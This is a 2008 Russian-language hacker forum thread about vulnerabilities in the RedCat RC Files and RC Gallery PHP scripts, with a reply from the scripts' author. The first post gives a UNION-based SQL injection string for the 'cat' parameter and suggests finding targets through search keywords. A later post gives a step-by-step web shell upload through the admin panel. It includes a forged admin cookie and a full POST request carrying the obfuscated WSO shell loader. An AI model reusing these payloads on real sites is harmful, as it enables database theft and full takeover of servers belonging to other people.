Уязвимости в скриптах от RedCat

Discussion in 'Веб-уязвимости' started by Серенький, 2 Feb 2008.

  1. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    Нашел банальную уязвимость в скрипте RC Files v1.0 от RedCat'a, но оказалось, что дырка эта присутствует и в другой его наработке, RC Gallery, причем кочует из версии к версии.

    -------------------------------------
    RC Files v1.0 | Powered by RedCat | ©2004-2008
    -------------------------------------

    Уязвимость присутствует из-за отсутствия фильтрации в параметре cat, что позволяет сформировать свой целевой запрос.

    cat=-1+union+select+1,2,3,4,5,6,7,8,9,0/*

    гуглим, видим:

    ...

    Уязвима также и версия 1.1, уязвимость аналогичная

    Более распространенный скрипт RC Gallery имеет аналогичную ошибку:
    -------------------------------------
    RC Gallery v(<=)2.3 | Powered by RedCat | ©2004-2008
    -------------------------------------

    Уязвимость присутствует в параметре cat. Позволяет нам составить целевой запрос.

    имеем

    ...

    в версии 2.4 узвимость устранена.

    keywords : RC Gallery v2.3 (2.1,1,1..), RC Files v1.1, Powered by RedCat
     
    #1 Серенький, 2 Feb 2008
    Last edited: 2 Feb 2008
    2 people like this.
  2. redcat2

    redcat2 New Member

    Joined:
    19 Feb 2008
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    При помощи гугла наткнулся на данную статью.
    Очень приятно , что на мои скрипты ктото обратил внимание))) Хоть и в таком ракурсе, но всёравно приятно! Спасибо.
    Скрипт галереи , это мой первый большой скрипт. Ни о каких "мерах безопасности" речь там не шла, была идея создать скрипт. До версии 2.4 они почти не отличаются друг от друга. Версия 2.4 переписана почти с нуля, но используется несколько кусков старого кода. До версии 2.5 руки не дошли, нужно было зарабатывать деньги и я стал заниматься "коммерческими" скриптами. Галереи 2.5 не будет, да и вообще наверное никаких больше скриптов не будет, не позволяет занятость на другом фронте. В обще при создании этой галереи я получил огромный опыт, хотя после были и другие более серьёзные скрипты.

    Если чтото интересно, спрашивайте...
    А пока, всем пока :cool:
     
    1 person likes this.
  3. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    наткнулся на эти скрипты а их до меня уже копали.. нашёл тоже самое.. такой облом.

    ====================
    заливка шелла

    1. пароль расшифровался.
    идём в админку adm_gallery.php
    редактируем Допустимые расширения и вписываем php через запятушку. заливаем шелл в месте загрузки картинок.
    2. пароль не расшифровался.
    посмотрев, исходники формируем сразу POST-запрос для заливки. По умолчанию php не фильтруется(!!!)
    в куках ставим gal_admin_get_pass=<хеш пароля>

    POST-запрос (весь код шелла wso не вместился)
    Code:
    POST /gal_admin.php HTTP/1.1
    Host: site.ru
    Keep-Alive: 30
    Proxy-Connection: keep-alive
    Cookie: gal_admin_get_pass=b01502fd0c860bdd35c5c9289de412db
    Content-Type: multipart/form-data; boundary=---------------------------11538186919912
    Content-Length: 23969
    
    -----------------------------11538186919912
    Content-Disposition: form-data; name="upload_cat"
    
    1
    -----------------------------11538186919912
    Content-Disposition: form-data; name="upload_name"
    
    123
    -----------------------------11538186919912
    Content-Disposition: form-data; name="upload_text"
    
    234
    -----------------------------11538186919912
    Content-Disposition: form-data; name="upload_big_file"; filename="wso2.4.php"
    Content-Type: application/force-download
    
    <?php
    $auth_pass = "пыщь";
    $color = "#df5";
    $default_action = "FilesMan";
    $default_charset = "Windows-1251";
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31W
    ....
    ...тут код шелла)))
    ....
    LkkJJYtIOBpIc4bmVCjHJNUt6eCg3BAGeLq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");?>
    -----------------------------11538186919912
    Content-Disposition: form-data; name="com"
    
    upload
    -----------------------------11538186919912
    Content-Disposition: form-data; name="gal_menu"
    
    add
    -----------------------------11538186919912--
     
    1 person likes this.